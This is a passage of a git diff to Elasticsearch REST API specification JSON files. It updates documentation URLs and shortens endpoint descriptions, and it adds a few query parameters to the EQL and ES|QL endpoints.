"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-gateway-dangling-indices.html", - "description": "Deletes the specified dangling index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-dangling-indices-delete-dangling-index", + "description": "Delete a dangling index" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json index f81afc3558cbd..5db8840873227 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json @@ -1,8 +1,8 @@ { "dangling_indices.import_dangling_index": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-gateway-dangling-indices.html", - "description": "Imports the specified dangling index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-dangling-indices-import-dangling-index", + "description": "Import a dangling index" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json index 4310faa96185f..ce868bdd21ee2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json @@ -1,8 +1,8 @@ { "dangling_indices.list_dangling_indices": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-gateway-dangling-indices.html", - "description": "Returns all dangling indices." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-dangling-indices-list-dangling-indices", + "description": "Get the dangling indices" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json index 7fbc693d069bf..15139e81c67d8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json @@ -1,8 +1,8 @@ { "delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete.html", - "description":"Removes a document from the index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete", + "description":"Delete a document" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json index cc36acea13492..c8edc0496cd55 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json @@ -1,8 +1,8 @@ { "delete_by_query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete-by-query.html", - "description":"Deletes documents matching the provided query." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-by-query", + "description":"Delete documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json index e8ff1a61f83f8..1c6a89eebf075 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json @@ -1,8 +1,8 @@ { "delete_by_query_rethrottle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-delete-by-query.html", - "description":"Changes the number of requests per second for a particular Delete By Query operation." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-by-query-rethrottle", + "description":"Throttle a delete by query operation" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json index cf6573372ddb2..0071fe8740f9e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json @@ -1,8 +1,8 @@ { "delete_script":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Deletes a script." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-script", + "description":"Delete a script or search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json index 5c6b05a548987..99f0a2def7fab 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json @@ -1,8 +1,8 @@ { "enrich.delete_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-enrich-policy-api.html", - "description": "Deletes an existing enrich policy and its enrich index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-delete-policy", + "description": "Delete an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json index 2add255148508..ae84a726df82c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json @@ -1,8 +1,8 @@ { "enrich.execute_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/execute-enrich-policy-api.html", - "description": "Creates the enrich index for an existing enrich policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-execute-policy", + "description": "Run an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json index e735a75f67ee9..5f0f4fc9ca5b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json @@ -1,8 +1,8 @@ { "enrich.get_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-enrich-policy-api.html", - "description": "Gets information about an enrich policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-get-policy", + "description": "Get an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json index 287c7d96dca9d..cf2c11cc21b12 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json @@ -1,8 +1,8 @@ { "enrich.put_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-enrich-policy-api.html", - "description": "Creates a new enrich policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-put-policy", + "description": "Create an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json index 835fa3f6ffef2..1bdeccc1c9715 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json @@ -1,8 +1,8 @@ { "enrich.stats": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-stats-api.html", - "description": "Gets enrich coordinator statistics and information about enrich policies that are currently executing." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-stats", + "description": "Get enrich stats" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json index 18f690227ca3c..4c8c2a2cd54ed 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json @@ -1,8 +1,8 @@ { "eql.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html", - "description": "Deletes an async EQL search by ID. If the search is still running, the search request will be cancelled. Otherwise, the saved search results are deleted." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-delete", + "description": "Delete an async EQL search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json index c7a228da97a53..34b770997eee5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json @@ -1,8 +1,8 @@ { "eql.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html", - "description": "Returns async results from previously executed Event Query Language (EQL) search" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get", + "description": "Get async EQL search results" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json index be8a439893362..00e478659b389 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json @@ -1,8 +1,8 @@ { "eql.get_status": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html", - "description": "Returns the status of a previously submitted async or stored Event Query Language (EQL) search" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get-status", + "description": "Get the async EQL status" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json index 0b1a7ad5a38d3..afb3b8508599e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json @@ -1,8 +1,8 @@ { "eql.search":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html", - "description": "Returns results matching a query expressed in Event Query Language (EQL)" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-search", + "description": "Get EQL search results" }, "stability": "stable", "visibility":"public", @@ -51,6 +51,31 @@ "type":"boolean", "description":"Control whether a sequence query should return partial results or no results at all in case of shard failures. This option has effect only if [allow_partial_search_results] is true.", "default":false + }, + "ccs_minimize_roundtrips":{ + "type":"boolean", + "description":"Indicates whether network round-trips should be minimized as part of cross-cluster search requests execution", + "default":true + }, + "ignore_unavailable":{ + "type":"boolean", + "description":"Whether specified concrete indices should be ignored when unavailable (missing or closed)" + }, + "allow_no_indices":{ + "type":"boolean", + "description":"Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)" + }, + "expand_wildcards":{ + "type":"enum", + "options":[ + "open", + "closed", + "hidden", + "none", + "all" + ], + "default":"open", + "description":"Whether to expand wildcard expression to concrete indices that are open, closed or both." } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query.json index 56895059d499d..f5e7d710242dd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query.json @@ -1,8 +1,8 @@ { "esql.async_query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-async-query-api.html", - "description":"Executes an ESQL request asynchronously" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query", + "description":"Run an async ES|QL query" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_delete.json index a6339559afd72..802c0ae31a9e4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_delete.json @@ -1,8 +1,8 @@ { "esql.async_query_delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-async-query-delete-api.html", - "description": "Delete an async query request given its ID." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-delete", + "description": "Delete an async ES|QL query" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json index c4670758f7fe9..07454a0877592 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json @@ -1,8 +1,8 @@ { "esql.async_query_get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-async-query-get-api.html", - "description": "Retrieves the results of a previously submitted async query request given its ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-get", + "description": "Get async ES|QL query results" }, "stability":"stable", "visibility":"public", @@ -26,6 +26,10 @@ ] }, "params":{ + "format":{ + "type":"string", + "description":"a short version of the Accept header, e.g. json, yaml" + }, "wait_for_completion_timeout":{ "type":"time", "description":"Specify the time that the request should block waiting for the final response" diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json index 6fbdefef8b689..181ebdaadae2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json @@ -1,8 +1,8 @@ { "esql.async_query_stop": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-async-query-stop-api.html", - "description": "Stops a previously submitted async query request given its ID and collects the results." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-stop", + "description": "Stop async ES|QL query" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json index a0e78cf4b1b74..781a1c67d70ba 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json @@ -2,15 +2,13 @@ "esql.get_query": { "documentation": { "url": null, - "description": "Executes a get ESQL query request" + "description": "Get a specific running ES|QL query information" }, "stability": "experimental", "visibility": "public", "headers": { - "accept": [], - "content_type": [ - "application/json" - ] + "accept": ["application/json"], + "content_type": ["application/json"] }, "url": { "paths": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json index c4f5abcdcb7a3..a0d5341a0dacc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json @@ -2,7 +2,7 @@ "esql.list_queries": { "documentation": { "url": null, - "description": "Executes a list ESQL queries request" + "description": "Get running ES|QL queries information" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json index 28a488a20528f..c15f6fb8fe88a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json @@ -1,8 +1,8 @@ { "esql.query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-query-api.html", - "description":"Executes an ESQL request" + "url":"https://www.elastic.co/docs/explore-analyze/query-filter/languages/esql-rest", + "description":"Run an ES|QL query" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json b/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json index 99e9793ebffe4..e1d65a06d3780 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json @@ -1,8 +1,8 @@ { "exists":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns information about whether a document exists in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Check a document" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json b/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json index 3cad1ab5fd7d0..221a7dac4efd6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json @@ -1,8 +1,8 @@ { "exists_source":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns information about whether a document source exists in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Check for a document source" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json b/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json index 8b25836d97154..b3d0aad8aa9ef 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json @@ -1,8 +1,8 @@ { "explain":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-explain.html", - "description":"Returns information about why a specific matches (or doesn't match) a query." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-explain", + "description":"Explain a document match result" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json index 6d5e8b5aa5698..652ebcf052f21 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json @@ -1,8 +1,8 @@ { "features.get_features":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-features-api.html", - "description":"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-get-features", + "description":"Get the features" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json index dec102a681c81..f1791e0ec2e0c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json @@ -1,8 +1,8 @@ { "features.reset_features":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Resets the internal state of features, usually by deleting system indices" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-reset-features", + "description":"Reset the features" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json b/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json index 27962b6ac10b2..f062eacdaa505 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json @@ -1,8 +1,8 @@ { "field_caps":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-field-caps.html", - "description":"Returns the information about the capabilities of fields among multiple indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-field-caps", + "description":"Get the field capabilities" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json index fc950dab3f665..9c83cd7d2ace2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json @@ -2,7 +2,7 @@ "fleet.delete_secret": { "documentation": { "url": null, - "description": "Deletes a secret stored by Fleet." + "description": "Deletes a secret stored by Fleet" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json index f58d0735c8230..861814fa6d873 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json @@ -2,7 +2,7 @@ "fleet.get_secret": { "documentation": { "url": null, - "description": "Retrieves a secret stored by Fleet." + "description": "Retrieves a secret stored by Fleet" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json index 97618bec8f4fb..f2c67e54d5d13 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json @@ -1,8 +1,8 @@ { "fleet.global_checkpoints":{ "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/get-global-checkpoints.html", - "description": "Returns the current global checkpoints for an index. This API is design for internal use by the fleet server project." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-fleet", + "description": "Get global checkpoints" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json index 3a9bf254e53b1..d805fbfb050be 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json @@ -2,7 +2,7 @@ "fleet.msearch":{ "documentation":{ "url": null, - "description": "Multi Search API where the search will only be executed after specified checkpoints are available due to a refresh. This API is designed for internal use by the fleet server project." + "description": "Run multiple Fleet searches" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json index a16369cd29e9b..5d5bbef5a3da8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json @@ -2,7 +2,7 @@ "fleet.post_secret": { "documentation": { "url": null, - "description": "Creates a secret stored by Fleet." + "description": "Creates a secret stored by Fleet" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json index b4e0ff5b3c5cb..1360853eaa72e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json @@ -2,7 +2,7 @@ "fleet.search":{ "documentation":{ "url": null, - "description": "Search API where the search will only be executed after specified checkpoints are available due to a refresh. This API is designed for internal use by the fleet server project." + "description": "Run a Fleet search" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get.json index 62eb47821e0aa..ce080dd6478c2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get.json @@ -1,8 +1,8 @@ { "get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns a document." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Get a document by its ID" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json index ae11aa0736307..f69f23ea9ae35 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json @@ -1,8 +1,8 @@ { "get_script":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Returns a script." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script", + "description":"Get a script or search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json index 332b57d791779..9886f24a55ceb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json @@ -1,8 +1,8 @@ { "get_script_context":{ "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/painless/master/painless-contexts.html", - "description":"Returns all script contexts." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-context", + "description":"Get script contexts" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json index 9c228017f0b20..65e84ea4291d3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json @@ -1,8 +1,8 @@ { "get_script_languages":{ "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Returns available script types, languages and contexts" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-languages", + "description":"Get script languages" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json index a17ae4b027fd5..b5419aed3803e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json @@ -1,8 +1,8 @@ { "get_source":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns the source of a document." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Get a document's source" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json b/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json index 311716fd6b484..aa8fcb57a03aa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json @@ -1,8 +1,8 @@ { "graph.explore":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/graph-explore-api.html", - "description": "Explore extracted and summarized information about the documents and terms in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-graph", + "description": "Explore graph analytics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json b/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json index 2cc9b8f008311..1ea610915cf87 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json @@ -1,8 +1,8 @@ { "health_report": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/health-api.html", - "description": "Returns the health of the cluster." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-health-report", + "description": "Get the cluster health" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json index cd6397fb61586..751bd5888533c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.delete_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-delete-lifecycle.html", - "description": "Deletes the specified lifecycle policy definition. A currently used policy cannot be deleted." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-delete-lifecycle", + "description": "Delete a lifecycle policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json index 94c37adb802f6..79ae1ad7146ea 100644 --- 